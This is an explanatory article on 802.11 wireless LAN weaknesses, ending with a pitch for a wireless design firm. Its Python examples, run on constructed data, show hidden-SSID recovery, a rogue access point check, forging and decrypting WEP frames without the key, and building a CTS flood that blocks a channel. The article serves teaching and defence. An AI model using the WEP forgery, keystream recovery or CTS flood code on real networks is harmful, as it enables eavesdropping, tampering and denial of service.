Wireless LAN Security
Because wireless networks use radio waves, wireless LANs are open to hackers trying to read sensitive information or disrupt the operation of the network. In fact, most wireless LANs don't implement any form of reliable security, allowing access to just about anyone. We have proven that by driving around several large cities and using 802.11 packet sniffing tools to detect wireless LANs. We found that many major corporations, retail stores, airports, and homes are wide open.
Spread spectrum not very secure
Several of the 802.11 wireless LAN standards (including 802.11b) use spread spectrum, a modulation technique developed during World War II to keep enemy forces from jamming radio communications and radio-guided missiles. When wireless LANs first began to appear in the early 1990s, vendors touted the inherent security of wireless LANs because of their use of spread spectrum technology. Some wireless LAN vendors today still advertise the security that spread spectrum supposedly provides.
Military spread spectrum systems get their secrecy from keeping the "spreading code" (the chip sequence or hopping pattern) secret: without the code, a receiver cannot despread the signal and recover the data. The problem, however, is that the 802.11 standard publishes the spreading codes so that companies can build interoperable 802.11 components. As a result, a hacker only needs an 802.11-compliant radio Network Interface Card (NIC) to receive the signal, which obliterates any security benefit of spread spectrum. What spread spectrum still delivers is resistance to narrowband interference, not confidentiality.
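To make the distinction concrete, here is an added example (not code from the original article) that spreads and despreads bits with the 11-chip Barker sequence the 802.11 DSSS PHY specifies for its 1 and 2 Mbit/s rates. The bit pattern and the constant-offset jammer model are constructed for illustration. A receiver holding the code rides out a jammer that is weaker than the processing gain; an eavesdropper with any standard 802.11 NIC holds the same published code and runs the same despread() to read the same bits.

```python
# Added example (not from the original article): DSSS spreading and despreading with
# the 11-chip Barker sequence that 802.11 publishes for its 1 and 2 Mbit/s DSSS rates.
# The bit pattern and the jammer model below are constructed for illustration.

# The Barker-11 chip sequence specified by the 802.11 DSSS PHY.
BARKER_11 = [+1, -1, +1, +1, -1, +1, +1, +1, -1, -1, -1]


def spread(bits, code=BARKER_11):
    """Map each bit to +1/-1 and multiply it by every chip of the code (11 chips per bit)."""
    chips = []
    for bit in bits:
        sign = 1 if bit else -1
        chips.extend(sign * c for c in code)
    return chips


def despread(chips, code=BARKER_11):
    """Correlate each code-length block of received chips with the code.

    The sign of the correlation is the bit; its magnitude is the processing gain
    (len(code) when there is no interference). Anyone holding `code` can do this,
    and for 802.11 everyone holds it.
    """
    n = len(code)
    bits = []
    for i in range(0, len(chips) - n + 1, n):
        corr = sum(r * c for r, c in zip(chips[i:i + n], code))
        bits.append(1 if corr > 0 else 0)
    return bits


def add_narrowband_jammer(chips, amplitude):
    """Stand-in for a narrowband interferer: a constant tone adds the same value to
    every chip. Because the Barker chips sum to +1, a constant of amplitude A shifts
    each correlation by only A, against a wanted signal of +/-11."""
    return [c + amplitude for c in chips]


def link_survives(bits, jammer_amplitude, code=BARKER_11):
    """True if the receiver (or an eavesdropper using the same public code)
    still recovers `bits` under a jammer of the given amplitude."""
    received = add_narrowband_jammer(spread(bits, code), jammer_amplitude)
    return despread(received, code) == list(bits)


if __name__ == "__main__":
    message = [1, 0, 1, 1, 0, 0, 1, 0]                # constructed sample bits
    print("jammer 8  :", link_survives(message, 8))   # processing gain absorbs it
    print("jammer 12 :", link_survives(message, 12))  # exceeds the gain, link fails
    # An eavesdropper with a standard 802.11 NIC runs the same despread() and reads the same bits.
```

The only thing standing between the eavesdropper and the data is the argument `code`, and 802.11 fixes it for everyone.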
SSIDs are useless
The 802.11 standard specifies the SSID (service set identifier) as the name of a wireless LAN, and a user's radio NIC must present the same SSID as the access point to associate and communicate with other devices. It is often treated as a form of password, and in fact the SSID is the only "security" mechanism the access point requires for association when the optional security features are not activated.
The use of SSIDs is a fairly weak form of security, however, because most access points broadcast the SSID several times per second in the body of each beacon frame (the default beacon interval is about 100 ms). A hacker can easily use an 802.11 analysis tool (e.g., AirMagnet, NetStumbler, or AiroPeek) to identify the SSID. Windows XP will even "sniff" the SSID in use by the network and automatically configure the radio NIC in the end-user device.
Some network administrators turn off SSID broadcasting (which leaves the SSID field in the beacon frames empty), but a hacker can still sniff the SSID from the probe and association frames that stations send when joining an access point, because those frames carry it in the clear. They just have to wait until someone associates or reassociates (e.g., when roaming) with the network.
Aside from sniffing the SSID, many wireless LAN administrators make it even easier by leaving the vendor's default SSID in place, and the defaults are well known. For example, Cisco uses tsunami, and most other vendors use the name of their company as the default SSID. Just do some war driving, and you'll see that this is true.
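The following is an added example (not code from the original article, and not from any of the analyzers named above) showing exactly where the SSID sits in 802.11 management frames and why turning off SSID broadcast does not hide it. It decodes the 24-byte MAC header, skips the fixed fields of each management subtype, and walks the tagged information elements; the two frames, the MAC addresses and the network name are constructed for the example.

```python
# Added example (not from the original article): a minimal 802.11 management-frame parser
# that pulls the SSID out of beacons and shows why "hidden" SSIDs leak anyway.
# The frames, MAC addresses and network name below are constructed for this example.
import struct

# Frame-control subtype nibble -> name, for the management subtypes handled here.
MGMT_SUBTYPES = {0: "assoc-req", 2: "reassoc-req", 4: "probe-req", 5: "probe-resp", 8: "beacon"}
# Fixed fields in each subtype's body before the tagged information elements (IEs) start:
# assoc-req: capability(2)+listen interval(2); reassoc-req adds current AP(6);
# probe-resp/beacon: timestamp(8)+interval(2)+capability(2); probe-req has none.
FIXED_LEN = {0: 4, 2: 10, 4: 0, 5: 12, 8: 12}
IE_SSID, IE_RATES, IE_DS_PARAM = 0, 1, 3
BROADCAST = b"\xff" * 6


def mac_str(addr):
    return ":".join("%02x" % b for b in addr)


def parse_ies(data):
    """Walk the tag/length/value list; returns {tag: value}."""
    ies, pos = {}, 0
    while pos + 2 <= len(data):
        tag, length = data[pos], data[pos + 1]
        ies[tag] = data[pos + 2:pos + 2 + length]
        pos += 2 + length
    return ies


def parse_mgmt_frame(raw):
    """Decode the 24-byte MAC header, skip the subtype's fixed fields, then read the IEs."""
    fc0 = raw[0]
    if (fc0 >> 2) & 0x3 != 0:
        raise ValueError("not a management frame")
    subtype = fc0 >> 4
    if subtype not in FIXED_LEN:
        raise ValueError("unsupported management subtype %d" % subtype)
    src, bssid = raw[10:16], raw[16:22]        # addr2 = transmitter, addr3 = BSSID
    ies = parse_ies(raw[24 + FIXED_LEN[subtype]:])
    ssid = ies.get(IE_SSID)
    # A "hidden" network still sends the SSID IE in its beacons, just with length 0
    # (some access points send NUL bytes instead).
    hidden = ssid is not None and ssid.strip(b"\x00") == b""
    return {
        "subtype": MGMT_SUBTYPES[subtype],
        "src": mac_str(src),
        "bssid": mac_str(bssid),
        "hidden": hidden,
        "ssid": None if (ssid is None or hidden) else ssid.decode("utf-8", "replace"),
        "channel": ies[IE_DS_PARAM][0] if ies.get(IE_DS_PARAM) else None,
    }


def recover_hidden_ssids(frames):
    """Map each BSSID that beacons with an empty SSID to the name carried in clear by
    the probe responses and (re)association requests that the standard requires."""
    parsed = [parse_mgmt_frame(f) for f in frames]
    hidden = {p["bssid"] for p in parsed if p["subtype"] == "beacon" and p["hidden"]}
    found = {}
    for p in parsed:
        if p["bssid"] in hidden and p["ssid"] and p["subtype"] in ("probe-resp", "assoc-req", "reassoc-req"):
            found[p["bssid"]] = p["ssid"]
    return found


# --- constructed sample capture: one hidden beacon, then a station associating ---
AP = bytes.fromhex("0200000000aa")    # locally administered, made-up addresses
STA = bytes.fromhex("0200000000bb")


def ie(tag, value):
    return bytes([tag, len(value)]) + value


def mgmt_frame(subtype, dst, src, bssid, fixed, ies):
    header = struct.pack("<BBH6s6s6sH", subtype << 4, 0, 0, dst, src, bssid, 0)
    return header + fixed + b"".join(ies)


def sample_capture():
    rates = ie(IE_RATES, b"\x82\x84\x8b\x96")                 # 1, 2, 5.5, 11 Mbit/s (basic)
    beacon_fixed = struct.pack("<QHH", 0, 100, 0x0001)       # timestamp, 100 TU interval, ESS
    hidden_beacon = mgmt_frame(8, BROADCAST, AP, AP, beacon_fixed,
                               [ie(IE_SSID, b""), rates, ie(IE_DS_PARAM, b"\x06")])
    assoc_fixed = struct.pack("<HH", 0x0001, 10)             # capability, listen interval
    assoc_req = mgmt_frame(0, AP, STA, AP, assoc_fixed, [ie(IE_SSID, b"corpnet"), rates])
    return [hidden_beacon, assoc_req]


if __name__ == "__main__":
    for frame in sample_capture():
        print(parse_mgmt_frame(frame))
    print(recover_hidden_ssids(sample_capture()))   # {'02:00:00:00:00:aa': 'corpnet'}
```

The beacon gives away the BSSID and channel even with the name blanked; the first association request from any legitimate user fills in the name. A real capture will also contain probe requests from stations that are actively looking for the hidden network by name.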
DHCP hurts security
Even if an intruder can associate with an access point by using the correct SSID, they usually need a valid IP address before they can directly reach resources (user PCs, servers, etc.) on the network. Many wireless LANs, though, use DHCP (dynamic host configuration protocol) to assign IP addresses automatically to any client that asks. With DHCP enabled, a hacker receives a valid IP address just as legitimate users do. This grants the hacker freedoms you'd rather not share. Turning DHCP off only slows them down: the addresses in use are visible in the unencrypted frames the hacker is already capturing, so picking an unused one by hand is easy.
For example, you may be sitting at an airport using a public wireless LAN. Someone associated to the same wireless LAN can easily use Windows to browse for other users (i.e., you) connected to the network. If you have file sharing turned on, the other person can click on your device, drill down to your documents folder, and open or copy files to their laptop. This is a serious problem that many end users overlook, especially when operating on home and public networks.
Man-in-the-middle attacks
Through the use of an 802.11 analyzer, a person can monitor the 802.11 frames sent over the wireless LAN and then fool the network through various "man-in-the-middle" attacks. The frames exchanged between a user's radio NIC and the access point during the association process are sent in the clear, so you'll learn the MAC addresses of both devices, the association ID assigned to the radio NIC, the SSID of the network, and, from the data frames that follow, the IP addresses in use.
With this information, someone can set up a rogue access point with the same SSID (on a different radio channel) closer to a particular user, so that the stronger signal leads the user's radio NIC to reassociate with the rogue access point. Because 802.11 provides no way for a station to authenticate the access point, the radio NIC will happily reassociate with the rogue. Once reassociation occurs, the rogue access point captures the traffic of unsuspecting users as they log in to their services, exposing user names and passwords to the hacker who controls the rogue access point.
Someone can also use man-in-the-middle techniques with a rogue radio NIC. After gleaning a valid station's parameters (MAC address, SSID, association ID) by monitoring frame transmissions, a hacker can program a rogue radio NIC to mimic the valid one. This enables the hacker to deceive the access point by disassociating the valid radio NIC (disassociation frames are not authenticated either) and then associating with the same parameters as the valid radio NIC. As a result, the hacker can use the rogue radio NIC to steal the session and carry on with a network-based service that the valid user had logged into.
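The defensive counterpart to the rogue access point described above is a periodic sweep with an analyzer and a comparison against the list of access points you actually own. The check below is an added example (not code from the original article or from any of the tools it names); the log format, the inventory of authorized access points and the log lines are all constructed for the example.

```python
# Added example (not from the original article): a rogue-access-point check run over
# beacon records from a wireless analyzer. The log format, the inventory of authorized
# access points and the log lines are all constructed for this example.
import re

# Authorized access points per SSID (constructed): BSSID -> channel it is configured on.
AUTHORIZED = {
    "corpnet": {"02:00:00:00:00:aa": 6, "02:00:00:00:00:ab": 11},
}

# One record per beacon seen: timestamp, BSSID, SSID, channel, received signal strength.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) beacon bssid=(?P<bssid>[0-9a-f:]{17}) ssid=(?P<ssid>\S*) "
    r"channel=(?P<channel>\d+) rssi=(?P<rssi>-?\d+)$"
)


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["channel"], rec["rssi"] = int(rec["channel"]), int(rec["rssi"])
    return rec


def find_rogue_aps(lines, authorized=AUTHORIZED):
    """One alert per offending BSSID.

    evil-twin:   an unknown BSSID advertising one of our SSIDs (the rogue AP in the text)
    bssid-clone: one of our BSSIDs seen on a channel it is not configured for; either a
                 rogue that copied the BSSID as well, or a misconfigured AP. Both deserve
                 a walk with an analyzer to locate the transmitter.
    """
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["ssid"] not in authorized:
            continue            # neighbours' networks are not impersonating ours
        known = authorized[rec["ssid"]]
        if rec["bssid"] not in known:
            alerts[rec["bssid"]] = "evil-twin: ssid %s from unauthorized bssid on channel %d (rssi %d)" % (
                rec["ssid"], rec["channel"], rec["rssi"])
        elif known[rec["bssid"]] != rec["channel"]:
            alerts[rec["bssid"]] = "bssid-clone: authorized bssid seen on channel %d, configured for %d" % (
                rec["channel"], known[rec["bssid"]])
    return alerts


# Constructed sample log (not a real capture).
SAMPLE_LOG = """\
2002-03-14T10:01:02 beacon bssid=02:00:00:00:00:aa ssid=corpnet channel=6 rssi=-48
2002-03-14T10:01:02 beacon bssid=02:00:00:00:00:ab ssid=corpnet channel=11 rssi=-61
2002-03-14T10:01:03 beacon bssid=02:00:00:00:00:dd ssid=cafe channel=6 rssi=-70
2002-03-14T10:01:03 beacon bssid=02:00:00:00:00:cc ssid=corpnet channel=1 rssi=-30
2002-03-14T10:01:04 beacon bssid=02:00:00:00:00:aa ssid=corpnet channel=1 rssi=-33
""".splitlines()

if __name__ == "__main__":
    for bssid, why in find_rogue_aps(SAMPLE_LOG).items():
        print(bssid, why)
```

A rogue that copies the SSID, the BSSID and the channel of a legitimate access point passes this inventory check; at that point the unusually strong signal and physically walking the site with the analyzer are what is left.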
Problems with WEP
On 802.11 networks, you can enable WEP (wired equivalent privacy), which encrypts the body of each frame with the RC4 stream cipher under a shared key. This is supposed to keep hackers from viewing sensitive e-mails, user names and passwords, proprietary documents, etc. In practice, hackers can fairly easily decode WEP-encrypted information after monitoring an active network for less than one day.
Three researchers at the University of California at Berkeley, Nikita Borisov, Ian Goldberg and David Wagner, discovered major security flaws in WEP's design, among them a 24-bit initialization vector (IV) that is too small to avoid keystream reuse, and a linear CRC-32 integrity check that lets an attacker modify an encrypted frame without detection. Furthermore, in August 2001, cryptographers Scott Fluhrer, Itsik Mantin and Adi Shamir published a paper on weaknesses in the key scheduling of RC4, the cipher on which WEP is based. Shortly thereafter, in late August 2001, a student at Rice University and two employees of AT&T Labs - Research (Adam Stubblefield, John Ioannidis and Aviel D. Rubin) successfully implemented the ideas expressed in those two publications against a live network. What's so fatal about it is that it doesn't require any special equipment. All you need is a PC with a standard wireless card running modified drivers downloaded from the Internet. With that equipment you can record and evaluate the several hundred thousand data packets the attack needs.
Consequently, don't depend on WEP to protect sensitive information. The use of WEP in most cases is nevertheless better than no encryption at all, especially if you deploy a mechanism to change the WEP key often.
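To show what the Berkeley findings mean in practice, the following added example (not code from the original article or from the papers cited) implements WEP's encapsulation as the standard defines it: RC4 keyed with the 24-bit IV prepended to the shared key, and a CRC-32 integrity check value (ICV) appended to the plaintext. It then demonstrates two of the flaws: changing the contents of an encrypted frame without the key, which works because CRC-32 is linear, and recovering one frame from another that reused the same IV. The key, IVs and frame contents are constructed; the RC4 key-recovery attack of Fluhrer, Mantin and Shamir is not implemented here.

```python
# Added example (not from the original article): a working model of WEP encapsulation,
# used to demonstrate two of the Borisov/Goldberg/Wagner findings: modifying an
# encrypted frame without the key (CRC-32 is linear) and keystream reuse when an IV
# repeats. The key, IVs and frame contents are constructed; the FMS key-recovery
# attack the text describes is not implemented here.
import struct
import zlib

SAMPLE_KEY = bytes.fromhex("0123456789")     # constructed 40-bit shared key


def rc4(key, length):
    """RC4 keystream of `length` bytes: key scheduling (KSA), then the generator (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP's integrity check value: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """Per-frame RC4 key = 24-bit IV || shared key; (plaintext || ICV) is XORed with the
    keystream, and the IV travels in the clear in front of the ciphertext."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key, frame):
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    data, tag = body[:-4], body[-4:]
    if icv(data) != tag:
        raise ValueError("ICV check failed")
    return data


def flip_bits(frame, offset, delta):
    """Turn plaintext bytes at `offset` into plaintext XOR `delta` without knowing the key.
    CRC-32 is affine: crc(m ^ d) == crc(m) ^ crc(d) ^ crc(zeros of len(m)), and XOR passes
    straight through the RC4 stream, so the encrypted ICV can be patched to match."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    d = bytearray(n)
    d[offset:offset + len(delta)] = delta
    d = bytes(d)
    patch = d + xor(icv(d), icv(bytes(n)))
    return iv + xor(ct, patch)


def keystream_reuse(frame_a, plaintext_a, frame_b):
    """Two frames under the same IV share a keystream: C_a ^ C_b == P_a ^ P_b, so a known
    plaintext for one frame reveals the other (as far as the known bytes reach)."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("IVs differ; keystreams are independent")
    keystream = xor(frame_a[3:], plaintext_a)
    return xor(frame_b[3:], keystream)[:len(frame_b) - 3 - 4]


if __name__ == "__main__":
    iv = b"\x00\x00\x01"
    a = wep_encrypt(SAMPLE_KEY, iv, b"user=alice;amount=0010")
    forged = flip_bits(a, 18, xor(b"0010", b"9010"))          # offset 18 = start of "0010"
    print(wep_decrypt(SAMPLE_KEY, forged))                    # b'user=alice;amount=9010'
    b = wep_encrypt(SAMPLE_KEY, iv, b"user=bob;amount=5000")  # same IV: only 2^24 exist
    print(keystream_reuse(a, b"user=alice;amount=0010", b))   # b'user=bob;amount=5000'
```

Neither attack needs the key: the first needs to know where in the frame the interesting bytes sit, the second needs one frame whose contents are predictable (a DHCP request or an ARP packet will do). Rotating the key often shortens the window for both, which is why the advice above still stands.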
Denial of service attacks
Another form of security attack is denial of service. In this case, the hacker might not steal any information. They just keep users from accessing services, either to gain some sort of competitive advantage or just to have some devious "fun."
A mischievous person can use a wireless client to insert bogus frames into the wireless LAN with the intent of keeping users from getting access to services. A brute force way of doing this is to set up a relatively high-power signal generator that produces enough RF interference to block other radio NICs from accessing the medium. The 802.11 MAC layer is fairly polite: its carrier sense defers transmission whenever it senses other RF activity. This gives the intruder enough control to keep users from accessing network services for an indefinite period of time.
Other more elegant methods for denying service include fooling valid radio NICs with fake 802.11 frames. For example, someone could set up their radio NIC (or an 802.11 frame generator) to send a continuous stream of CTS (clear-to-send) frames, which mimic an access point telling a particular radio NIC to transmit and all others to wait. (CTS is part of 802.11's RTS/CTS function.) The radio NIC being given permission to transmit can be a fictitious one. Every other station that hears the CTS sets its network allocation vector (NAV) to the duration value in the frame and stays off the medium for that long, and because 802.11 control frames are never authenticated, the legitimate radio NICs in end-user devices will keep delaying access to the medium for as long as the stream continues.
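The following added example (not code from the original article) builds the CTS frame just described and works out how much of the medium a stream of them takes away. The receiver address and the timings are constructed; the frame layout and the 32767 microsecond NAV ceiling are those of the 802.11 standard.

```python
# Added example (not from the original article): building the CTS frame the text
# describes and computing how much of the medium a stream of them reserves through the
# network allocation vector (NAV). Addresses and timings are constructed.
import struct

CTS_FC0 = 0xC4        # frame control byte 0: subtype 1100 (CTS), type 01 (control), version 0
NAV_MAX_US = 32767    # Duration/ID with bit 15 clear is a NAV reservation in microseconds


def build_cts(receiver, duration_us):
    """14-byte CTS: FC(2) Duration(2) RA(6) FCS(4). FCS left zero; the radio fills it in.
    A CTS carries no transmitter address, so nothing in it identifies (or authenticates) the sender."""
    if not 0 <= duration_us <= NAV_MAX_US:
        raise ValueError("NAV duration must be 0..32767 us")
    return struct.pack("<BBH6s", CTS_FC0, 0, duration_us, receiver) + b"\x00" * 4


def nav_from_frame(frame):
    """What a third-party station does with any frame it hears: read Duration/ID and,
    if bit 15 is clear, treat it as a NAV value. Returns None for the other encodings."""
    duration = struct.unpack_from("<H", frame, 2)[0]
    return None if duration & 0x8000 else duration


def nav_busy_fraction(cts_times_us, duration_us, window_us):
    """Fraction of [0, window) during which every station except the RA must defer:
    the union of the NAV intervals [t, t + duration) started by each CTS."""
    busy, covered_until = 0, 0
    for t in sorted(cts_times_us):
        start, end = max(t, covered_until), min(t + duration_us, window_us)
        if end > start:
            busy += end - start
        covered_until = max(covered_until, t + duration_us)
    return busy / window_us


def cts_rate_for_full_denial(duration_us=NAV_MAX_US):
    """Frames per second needed to keep the NAV set continuously: one per NAV interval."""
    return -(-1_000_000 // duration_us)      # ceiling division


if __name__ == "__main__":
    phantom = bytes.fromhex("0200000000ee")   # made-up RA: the fictitious station "given permission"
    frame = build_cts(phantom, NAV_MAX_US)
    print(frame.hex(), nav_from_frame(frame))
    one_second = range(0, 1_000_000, NAV_MAX_US)
    print(nav_busy_fraction(one_second, NAV_MAX_US, 1_000_000))  # 1.0
    print(cts_rate_for_full_denial())                             # 31
```

Thirty-one 14-byte frames per second, a few hundred bytes of airtime, are enough to keep every station on the channel silent, which is why this attack is cheaper than jamming and harder to spot on a spectrum analyzer.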
The bottom line
As you can see, there are many wireless LAN security issues that require attention. If and how you handle these problems depends greatly on your security requirements. In some cases, you might want to keep the network as open as possible and only protect files on user PCs. Most other scenarios, however, will likely need much more. It is possible to make wireless LANs very secure, and that's where NAS Wireless comes in.
NAS Wireless can design a secure wireless network to handle the needs of your company or organization.